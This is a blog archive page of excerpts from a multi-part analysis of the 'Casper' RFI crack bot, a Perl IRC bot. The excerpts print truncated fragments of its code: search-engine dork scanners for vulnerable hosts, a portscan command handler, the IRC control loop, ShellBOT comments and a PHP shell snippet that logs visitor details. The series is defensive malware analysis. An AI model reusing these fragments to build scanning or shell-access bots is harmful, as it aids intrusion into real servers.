Irregular Expressions:

www perl bot

1

September 26, 2010  8:47 PM

Casper RFI crack bot – Part 16 – Last Part



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

So looking over all of the scripts what do we have? What is in use here is a collection of scripts by varying authors from multiple nationalities in different languages.  This in a best case scenario is a script kiddie, also by the fact that he left his gmail address in the script that was...

September 26, 2010  12:50 AM

Casper RFI crack bot – Part 15



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

What this appears to be looking for is more machines to exploit, big surprise! I followed it back for a bit and this is what I ended up with.

sub se_yahoo {
  my ($chan,$key,$nf) = @_;

sub s_engine {
    my ($f,$se,$type,$chan,$bug,$dork,$ef) = @_;

sub s_cari {
  #Type: 1 = Cari...


September 26, 2010  12:23 AM

Casper RFI crack bot – Part 14



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

One more script listed at the top of the main one.

$filebotscan = "scan.txt";
It's full of all sorts of stuff nothing really caught my attention until I reached this.
##[ GOOGLE ]##
sub se_google {
  my ($chan,$key,$nf) = @_;
  my @daftar;
  my $num = 50; my $max = 5000; my...


September 25, 2010  9:21 PM

Casper RFI crack bot – Part 13



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

There is a few more things that are worth looking at.

 if ($funcarg =~ /^portscan (.*)/) {
             my $hostip="$1";
             my...


September 16, 2010  10:05 PM

Casper RFI crack bot – Part 12



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

So what is going on next,

my $line_temp;
while( 1 ) {
     while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
     delete($irc_servers{''}) if (defined($irc_servers{''}));
     &DCC::connections;
     my @ready = $sel_cliente->can_read(0.6);
     next...


September 15, 2010  10:14 AM

Casper RFI crack bot – Part 11



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

Ok we have a couple more to go through. Next is;

$filebotperl = "iso.txt";
I love comments, at least we don't have to guess what this is for.
#!/usr/bin/perl
#
#  ShellBOT by: devil__
#       Greetz: Puna, Kelserific
# Comandos:
#           @oldpack <ip>...


September 9, 2010  9:10 AM

Casper RFI crack bot – Part 10



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

The next on the list is

$filebotphp  = "bot.txt";
This looks pretty specific to the irc bot, but there is something encoded again just like in the other scripts.
$dc_source =...


August 27, 2010  1:14 PM

Casper RFI crack bot – Part 9



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

So it looks like sh.txt is all about shell access, wow what a surprise! The next item is def.txt, there is not a whole lot in there beside the defacement message, so we are going to move on. The next item is a tar.gz, psy.tar.gz.  Let's unpack it and look around. It's from a project...


August 27, 2010  11:59 AM

Casper RFI crack bot – Part 8



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

We have one more to decode, $shell_data

$shell_data = "$visitcount = $HTTP_COOKIE_VARS["visits"];
if( $visitcount == "") {
     $visitcount = 0;
     $visitor = $_SERVER["REMOTE_ADDR"];
     $web = $_SERVER["HTTP_HOST"];
     $inj = $_SERVER["REQUEST_URI"];
     $target =...


August 27, 2010  8:48 AM

Casper RFI crack bot – Part 7



Posted by: Dan O'Connor
casper bot, casper rfi perl bot, perl bot, www perl bot

At first I was thinking that these might be encrypted, but that did not turn out to be the case. The first one we found was...


1

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: